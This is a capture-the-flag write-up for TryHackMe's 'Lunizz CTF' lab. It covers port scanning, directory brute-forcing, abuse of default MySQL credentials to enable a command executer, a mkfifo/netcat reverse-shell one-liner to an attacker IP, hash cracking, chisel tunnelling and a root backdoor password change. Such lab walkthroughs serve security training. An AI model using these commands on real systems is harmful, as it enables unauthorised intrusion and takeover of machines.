Lunizz CTF -TryHackMe

lunizz CTF

This is a write-up for another of TryHackMe’s rooms, named “Lunizz CTF”. The room is available here:

https://tryhackme.com/room/lunizzctfnd

As always, let’s start our enumeration process to find out which services are running on the target.

Enumeration

NMAP

# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.190.71

┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap -sS -Pn -T4 -p- 10.10.190.71
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-24 16:34 EST
Nmap scan report for 10.10.190.71
Host is up (0.024s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
4444/tcp open krb524
5000/tcp open upnp
Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds

# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p22,80,3306,4444,5000 10.10.190.71

┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap -O -A -Pn -T4 -p22,80,3306,4444,5000 10.10.190.71
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-24 16:38 EST
Nmap scan report for 10.10.190.71
Host is up (0.056s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f8:08:db:be:ed:80:d1:ef:a4:b0:a9:e8:2d:e2:dc:ee (RSA)
| 256 79:01:d6:df:8b:0a:6e:ad:b7:d8:59:9a:94:0a:09:7a (ECDSA)
|_ 256 b1:a9:ef:bb:7e:5b:01:cd:4c:8e:6b:bf:56:5d:a7:f4 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3306/tcp open mysql MySQL 5.7.32-0ubuntu0.18.04.1
| mysql-info:
| Protocol: 10
| Version: 5.7.32-0ubuntu0.18.04.1
| Thread ID: 4
| Capabilities flags: 65535
| Some Capabilities: ODBCClient, Support41Auth, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, LongPassword, SupportsTransactions, LongColumnFlag, IgnoreSigpipes, SwitchToSSLAfterHandshake, SupportsCompression, FoundRows, InteractiveClient, Speaks41ProtocolNew, SupportsLoadDataLocal, DontAllowDatabaseTableColumn, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: iM\x08P=\x1A "M}K^\x16jnU\x1Cv\x10]
|_ Auth Plugin Name: mysql_native_password
| ssl-cert: Subject: commonName=MySQL_Server_5.7.32_Auto_Generated_Server_Certificate
| Not valid before: 2020-12-10T19:29:01
|_Not valid after: 2030-12-08T19:29:01
|_ssl-date: TLS randomness does not represent time
4444/tcp open krb524?
| fingerprint-strings:
| GetRequest:
| Can you decode this for me?
| cmFuZG9tcGFzc3dvcmQ=
| Wrong Password
| NULL:
| Can you decode this for me?
| cmFuZG9tcGFzc3dvcmQ=
| SSLSessionReq:
| Can you decode this for me?
|_ ZXh0cmVtZXNlY3VyZXJvb3RwYXNzd29yZA==
5000/tcp open upnp?
| fingerprint-strings:
| DNSStatusRequestTCP, FourOhFourRequest, GenericLines, Kerberos, LDAPSearchReq, NULL, NotesRPC, RPCCheck, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe, giop, oracle-tns:
| OpenSSH 5.1
|_ Unable to load config info from /usr/local/ssl/openssl.cnf
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 22.04 ms 10.8.0.1
2 22.81 ms 10.10.190.71
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.42 seconds

Port 22 runs a stable SSH version with no known vulnerabilities. Port 80 has a web server, which we will explore further in the next section. MySQL is running on port 3306. Port 4444 exposes two base64-encoded passwords which may be useful later on. Port 5000 appears to be running OpenSSH 5.1, a very old SSH version; we will explore it later.

Directory Brute Forcing with FFUF

We saw that port 80 is open, so let’s brute-force the directories and files exposed by this web server using ffuf:

ffuf -u http://10.10.190.71/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c

┌──(kali㉿kali)-[/tmp]
└─$ ffuf -u http://10.10.190.71/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c
v1.2.1
________________________________________________
:: Method : GET
:: URL : http://10.10.190.71/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .html .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
index.php [Status: 200, Size: 10917, Words: 3499, Lines: 375]
instructions.txt [Status: 200, Size: 338, Words: 39, Lines: 13]
hidden [Status: 301, Size: 313, Words: 20, Lines: 10]
whatever [Status: 301, Size: 315, Words: 20, Lines: 10]
.html [Status: 403, Size: 277, Words: 20, Lines: 10]
[Status: 200, Size: 10917, Words: 3499, Lines: 375]
.php [Status: 403, Size: 277, Words: 20, Lines: 10]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10]
:: Progress: [882184/882184] :: Job [1/1] :: 475 req/sec :: Duration: [0:18:17] :: Errors: 0 ::

We see a few interesting results above. The “whatever” directory looks interesting, as it indicates that we can run commands on the server, but the mode appears to be disabled:

cmd executer mode 0

What is the default password for mysql?

From the ffuf scan we saw a file named “instructions.txt”, so let’s open it in a browser:

instructions.txt

As we can see, we found a MySQL user and a corresponding default password. Let’s connect to the database using this user and password:

mysql -u runcheck -h 10.10.20.133 -p

connect database using mysql

And yes, we can connect to the database. Let’s explore it by running the following commands:

MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| runornot |
+--------------------+
2 rows in set (0.019 sec)
MySQL [(none)]> use runornot;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [runornot]> show tables;
+--------------------+
| Tables_in_runornot |
+--------------------+
| runcheck |
+--------------------+
1 row in set (0.019 sec)
MySQL [runornot]> select * from runcheck;
+------------+
| [REDACTED] |
+------------+
| 0 |
+------------+
1 row in set (0.028 sec)
MySQL [runornot]>

I can’t run commands, there must be a mysql column that controls command executer:

From the table “runcheck”, we found the name of the column which appears to control the command executer, as its value is currently 0. We can update this value to 1 and check whether we can execute something.

MySQL [runornot]> UPDATE runcheck SET [REDACTED] = 1;
Query OK, 1 row affected (0.030 sec)
Rows matched: 1 Changed: 1 Warnings: 0
MySQL [runornot]> select * from runcheck;
+------------+
| [REDACTED] |
+------------+
| 1 |
+------------+
1 row in set (0.018 sec)
MySQL [runornot]>

Now that the column’s value is updated, let’s check whether we can execute commands:

cmd executer mode 1

Indeed we can!

a folder shouldn’t be…

Let’s execute “ls -lrt /” and we will get the answer to the above question.

Reverse Shell

From the command executer we can now also get a reverse shell. Execute the following from the executer after starting a netcat listener on your Kali/attacker machine:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc KALI_IP 9999 >/tmp/f

Yes, we got the shell:

reverse shell

Upgrade Shell

Upgrade and stabilize the shell we got by running the following commands:

/usr/bin/script -qc /bin/bash /dev/null
control+z to background
stty raw -echo
fg
export TERM=xterm

Privilege Escalation

Transfer LinPEAS.sh onto the target and run it. We can see that something is running on internal port 8080:

Ports

Also, we found a directory /var/backups/.scripts that explains what is running on ports 4444 and 5000, which turn out to be rabbit holes.

/var/backups

Exploring the directory /proct, which we found earlier and which LinPEAS also highlighted, we found a Python file with the following code:

www-data@lunizz:/$ cat /proct/pass/bcrypt_encryption.py 
import bcrypt
import base64
password = # https://www.youtube.com/watch?v=-tJYN-eG1zk&ab_channel=QueenOfficial
bpass = password.encode('ascii')
passed= str(base64.b64encode(bpass))
hashAndSalt = bcrypt.hashpw(passed.encode(), bcrypt.gensalt())
print(hashAndSalt)
salt = b'$2b$12$SVInH5XmuS3C7eQkmqa6UOM6sDIuumJPrvuiTr.Lbz3GCcUqdf.z6'
# I wrote this code last year and i didnt save password verify line... I need to find my password

The YouTube link hints that the password can be found in the rockyou.txt wordlist, and the code above shows that the hash is a bcrypt hash. So let’s crack it with John the Ripper:

john -format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

where hash.txt contains the hash. This still didn’t crack the password.

We will use the code given above to write a Python script that takes each password from rockyou.txt, base64-encodes it, bcrypt-hashes it with the salt, and compares the result with the given hash (the salt is actually part of the hash; the script confusingly stores the full hash in a variable named “salt”):

This will take a long time to crack the password, and it will fail for some passwords in rockyou.txt as they contain special characters. It is best to remove those passwords from the list as you encounter them, along with the passwords which have already been tested so far.

[**UPDATE**]

From the Python docs, we can add an ‘ignore’ error handler on line 10 of the script above. This will handle the special characters automatically, and there should be no need to modify rockyou.txt.

hi adam, do you remember our place?

Now switch user to “adam” using this password, as the file “/proct/pass/bcrypt_encryption.py” was owned by the user “adam”. Exploring the home directory, you will find the file which contains the password for mason:

adam@lunizz:~$ cat /home/adam/Desktop/.archive/to_my_best_friend_adam.txt 
do you remember our place
i love there it's soo calming
i will make that lights my password
--https://www.google.com/maps/@68.5090469,27.481808,3a,75y,313.8h,103.6t/data=!3m6!1e1!3m4!1skJPO1zlKRtMAAAQZLDcQIQ!3e2!7i10000!8i5000
adam@lunizz:~$

Open the link and it will reveal the password.

user.txt

Now switch user to “mason” with this newly found password, and we will find user.txt in mason’s home directory:

root.txt

We saw with LinPEAS that something is running on internal port 6666. We can set up port forwarding to our Kali machine and access this internal port. We will use chisel for port forwarding:

On Kali, run chisel as a server:

./chisel server -p 9000 --reverse -v

chisel as server

On the target, run chisel as a client:

./chisel client 10.8.98.192:9000 R:10.8.98.192:8080:127.0.0.1:8080

chisel as client

Here chisel, running as a client, connects to the server (chisel running on the Kali machine on port 9000) and will ‘R’edirect traffic from port 8080 on the Kali machine (10.8.98.192 in my case) to internal port 8080 on the target machine.

Accessing http://10.8.98.192:8080 from the Kali machine, we get Mason’s Root Backdoor:

Mason’s Root Backdoor

Intercept this request in Burp and you will notice that the request/response is sent to the server using PHP; from the above, we need to send a request with a password and a command type to access the backdoor. Taking the example from here, the request can be sent to the target like this:

Let’s send the request using PHP from the command line with the above script:

So we need to use Mason’s password and send the requests again with cmd type as lsla:

This worked! The contents are the file listing of the root directory. Now send the request with passwd as the command type:

This changed the password of the root user. Let’s switch user to root using this new password:

This also worked, and we found the root flag at /root/root.txt.

That’s it.

0xsanz

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900